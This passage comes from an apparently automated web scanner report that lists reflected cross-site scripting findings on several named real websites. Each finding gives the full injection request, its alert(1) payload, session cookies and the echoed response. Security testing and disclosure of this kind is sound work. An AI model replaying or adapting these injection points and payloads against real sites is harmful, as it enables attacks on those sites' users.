The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d478"-alert(1)-"52928c4d4d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /galleries?9d478"-alert(1)-"52928c4d4d7=1 HTTP/1.1 Host: www.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK Server: Apache/1.3.37 Last-Modified: Sun, 14 Nov 2010 22:42:39 GMT Content-Type: text/html; charset=utf-8 Expires: Sun, 14 Nov 2010 22:42:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:42:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.223. http://www.miami.com/gay [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miami.com
Path:
/gay
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af6fa"-alert(1)-"6c3dea84605 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gay?af6fa"-alert(1)-"6c3dea84605=1 HTTP/1.1 Host: www.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK Server: Apache/1.3.37 Last-Modified: Sun, 14 Nov 2010 22:43:26 GMT Content-Type: text/html; charset=utf-8 Expires: Sun, 14 Nov 2010 22:43:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:43:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 72751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.224. http://www.miami.com/hotels [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miami.com
Path:
/hotels
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d989"-alert(1)-"1c56ab040ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hotels?4d989"-alert(1)-"1c56ab040ce=1 HTTP/1.1 Host: www.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK Server: Apache/1.3.37 Last-Modified: Sun, 14 Nov 2010 22:43:59 GMT Content-Type: text/html; charset=utf-8 Expires: Sun, 14 Nov 2010 22:44:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:44:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 95134
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.225. http://www.miami.com/movies [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miami.com
Path:
/movies
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c6eb"-alert(1)-"029fda865f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /movies?6c6eb"-alert(1)-"029fda865f4=1 HTTP/1.1 Host: www.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK Server: Apache/1.3.37 Last-Modified: Sun, 14 Nov 2010 22:42:30 GMT Content-Type: text/html; charset=utf-8 Expires: Sun, 14 Nov 2010 22:42:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:42:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 69125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.226. http://www.miami.com/movies/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miami.com
Path:
/movies/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 892e0"-alert(1)-"96ce8fc124 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /movies/?892e0"-alert(1)-"96ce8fc124=1 HTTP/1.1 Host: www.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK Server: Apache/1.3.37 Last-Modified: Sun, 14 Nov 2010 22:54:06 GMT Content-Type: text/html; charset=utf-8 Expires: Sun, 14 Nov 2010 22:54:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:54:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 69125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.227. http://www.miami.com/nightlife [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miami.com
Path:
/nightlife
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6577"-alert(1)-"5b0a69b1321 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nightlife?b6577"-alert(1)-"5b0a69b1321=1 HTTP/1.1 Host: www.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK Server: Apache/1.3.37 Last-Modified: Sun, 14 Nov 2010 22:43:58 GMT Content-Type: text/html; charset=utf-8 Expires: Sun, 14 Nov 2010 22:44:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:44:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 73883
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.228. http://www.miami.com/restaurants [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miami.com
Path:
/restaurants
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4407a"-alert(1)-"6f919770c59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /restaurants?4407a"-alert(1)-"6f919770c59=1 HTTP/1.1 Host: www.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK Server: Apache/1.3.37 Last-Modified: Sun, 14 Nov 2010 22:44:00 GMT Content-Type: text/html; charset=utf-8 Expires: Sun, 14 Nov 2010 22:44:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:44:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 78130
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.229. http://www.miami.com/see-do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miami.com
Path:
/see-do
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f9e5"-alert(1)-"44afdd7ab8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /see-do?7f9e5"-alert(1)-"44afdd7ab8e=1 HTTP/1.1 Host: www.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK Server: Apache/1.3.37 Last-Modified: Sun, 14 Nov 2010 22:43:56 GMT Content-Type: text/html; charset=utf-8 Expires: Sun, 14 Nov 2010 22:43:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:43:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 71616
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.230. http://www.miami.com/shopping [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miami.com
Path:
/shopping
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c96d"-alert(1)-"25b0154ec80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shopping?7c96d"-alert(1)-"25b0154ec80=1 HTTP/1.1 Host: www.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK Server: Apache/1.3.37 Last-Modified: Sun, 14 Nov 2010 22:43:58 GMT Content-Type: text/html; charset=utf-8 Expires: Sun, 14 Nov 2010 22:44:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:44:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 71991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f1b7'%3balert(1)//6fc0ef752d5 was submitted in the version parameter. This input was echoed as 1f1b7';alert(1)//6fc0ef752d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reg-bin/tint.cgi?mode=edit&version=newsletter1f1b7'%3balert(1)//6fc0ef752d5 HTTP/1.1 Host: www.miamiherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mi__classads_featured=o7p1289710800;
Response
HTTP/1.1 200 OK Server: Apache/1.3.41 Mi-app-host: rdds008p Content-Type: text/html; charset=ISO-8859-1 Expires: Sun, 14 Nov 2010 22:53:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 22:53:31 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41352
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
<head>
<SCRIPT LANGUAGE="JavaScript"> <!-- var gomez={ gs: new Date().getTime(), acctId:'D3FD89', pgId:'v-newsletter1f1b7';alert(1)//6fc0ef752d5', grpId:'Miami Herald' };
var gomez=gomez?gomez:{};gomez.h3=function(d, s){for(var p in s){d[p]=s[p];}return d;};gomez.h3(gomez,{b3:function(r){if(r<=0)return false;return Math.random()<=r&&r;},b ...[SNIP]...
The value of the blog_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3350"><script>alert(1)</script>5cb7dc9a388 was submitted in the blog_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?a=profile&u=2&t=blog&blog_id=3035d3350"><script>alert(1)</script>5cb7dc9a388 HTTP/1.1 Host: www.momsmiami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <!-- blogs --> <!-- sta ...[SNIP]... <a href="/?a=profile&u=2&t=blog&blog_id=3035d3350"><script>alert(1)</script>5cb7dc9a388"> ...[SNIP]...
The value of the link_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8219c"><script>alert(1)</script>62f20d5abff was submitted in the link_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?a=birthday_pages&link_id=298219c"><script>alert(1)</script>62f20d5abff HTTP/1.1 Host: www.momsmiami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eaa2"><script>alert(1)</script>f0ceec3a72 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?a=profile&u=2&t=blog6eaa2"><script>alert(1)</script>f0ceec3a72&blog_id=3035 HTTP/1.1 Host: www.momsmiami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <!-- blogs --> <!-- sta ...[SNIP]... <a href="/?a=profile&u=2&t=blog6eaa2"><script>alert(1)</script>f0ceec3a72&blog_id=3035"> ...[SNIP]...
The value of the blog_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c09"><script>alert(1)</script>51fe99986e0 was submitted in the blog_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /forum/memberlist.php?mode=viewprofile&u=2&t=blog&blog_id=347551c09"><script>alert(1)</script>51fe99986e0 HTTP/1.1 Host: www.momsmiami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <!-- blogs --> <!-- sta ...[SNIP]... <a href="/?a=profile&u=2&t=blog&blog_id=347551c09"><script>alert(1)</script>51fe99986e0"> ...[SNIP]...
2.236. http://www.momsmiami.com/forum/memberlist.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.momsmiami.com
Path:
/forum/memberlist.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c174"><script>alert(1)</script>28e9ec410ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /forum/memberlist.php?mode=viewprofile&u=2&t=blog&blog_id=/8c174"><script>alert(1)</script>28e9ec410ab3475 HTTP/1.1 Host: www.momsmiami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <!-- blogs --> <!-- sta ...[SNIP]... <a href="/?a=profile&u=2&t=blog&blog_id=/8c174"><script>alert(1)</script>28e9ec410ab3475"> ...[SNIP]...
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7e94"><script>alert(1)</script>ee4ccd85f90 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /forum/memberlist.php?mode=viewprofile&u=2&t=blogd7e94"><script>alert(1)</script>ee4ccd85f90&blog_id=3475 HTTP/1.1 Host: www.momsmiami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <!-- blogs --> <!-- sta ...[SNIP]... <a href="/?a=profile&u=2&t=blogd7e94"><script>alert(1)</script>ee4ccd85f90&blog_id=3475"> ...[SNIP]...
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84690"><script>alert(1)</script>3bc91134198 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?a=profile&t=blog84690"><script>alert(1)</script>3bc91134198&u=2&date=new HTTP/1.1 Host: www.momsmiami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <!-- blogs --> <!-- sta ...[SNIP]... <a href="/?a=profile&u=2&t=blog84690"><script>alert(1)</script>3bc91134198&blog_id=3475"> ...[SNIP]...
The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a354"><script>alert(1)</script>f9d100f9d13 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /view_photo.php?c=8059a354"><script>alert(1)</script>f9d100f9d13&photo=1162&t=home&TB_iframe=true&height=600&width=730&modal=true HTTP/1.1 Host: www.momsmiami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d36a"><script>alert(1)</script>8c772da80c8 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /view_photo.php?c=805&photo=1162&t=home3d36a"><script>alert(1)</script>8c772da80c8&TB_iframe=true&height=600&width=730&modal=true HTTP/1.1 Host: www.momsmiami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
The value of the 514e9 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d23b'-alert(1)-'2f0a88819c9 was submitted in the 514e9 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsfb/embed.php?pid=4350&bid=2267&514e97d23b'-alert(1)-'2f0a88819c9 HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=tgkar1ao449m0cf8fnr8i5oqb2;
var IMAGE_ROOT = 'http://www.paperg.com/beta/'; var flyerboard_root = 'http://www.paperg.com/jsfb/'; var remote_ip = '174.121.222.18'; var view = ''; var edit = '0'; var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267&514e97d23b'-alert(1)-'2f0a88819c9';
//-- getting all script elements from document var scripts = document.getElementsByTagName('script');
//-- grabbing our script element var scriptEl = scripts[ scripts.length - 1 ];
The value of the 514e9'-alert(1)-'c9c3e793f35 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b45a5'-alert(1)-'33bc75a77ed was submitted in the 514e9'-alert(1)-'c9c3e793f35 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var IMAGE_ROOT = 'http://www.paperg.com/beta/'; var flyerboard_root = 'http://www.paperg.com/jsfb/'; var remote_ip = '174.121.222.18'; var view = ''; var edit = '0'; var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267&514e9'-alert(1)-'c9c3e793f35=1b45a5'-alert(1)-'33bc75a77ed';
//-- getting all script elements from document var scripts = document.getElementsByTagName('script');
//-- grabbing our script element var scriptEl = scripts[ scripts.length - 1 ];
The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 18be1%3balert(1)//7595c8d1dbb was submitted in the bid parameter. This input was echoed as 18be1;alert(1)//7595c8d1dbb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var IMAGE_ROOT = 'http://www.paperg.com/beta/'; var flyerboard_root = 'http://www.paperg.com/jsfb/'; var remote_ip = '174.121.222.18'; var view = ''; var edit = '0'; var EMBED_URL226718be1;alert(1)//7595c8d1dbb = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=226718be1%3balert(1)//7595c8d1dbb';
//-- getting all script elements from document var scripts = document.getElementsByTagName('script'); ...[SNIP]...
The value of the bid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6a1d'-alert(1)-'544a3639a3c was submitted in the bid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var IMAGE_ROOT = 'http://www.paperg.com/beta/'; var flyerboard_root = 'http://www.paperg.com/jsfb/'; var remote_ip = '174.121.222.18'; var view = ''; var edit = '0'; var EMBED_URL2267b6a1d'-alert(1)-'544a3639a3c = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267b6a1d'-alert(1)-'544a3639a3c';
//-- getting all script elements from document var scripts = document.getElementsByTagName('script');
//-- grabbing our script element var scriptEl = scripts[ scripts.length - 1 ];
...[SNIP]...
2.245. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.paperg.com
Path:
/jsfb/embed.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 514e9'-alert(1)-'c9c3e793f35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var IMAGE_ROOT = 'http://www.paperg.com/beta/'; var flyerboard_root = 'http://www.paperg.com/jsfb/'; var remote_ip = '174.121.222.18'; var view = ''; var edit = '0'; var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267&514e9'-alert(1)-'c9c3e793f35=1';
//-- getting all script elements from document var scripts = document.getElementsByTagName('script');
//-- grabbing our script element var scriptEl = scripts[ scripts.length - 1 ]; ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a4e3'-alert(1)-'ba6e9cc672 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
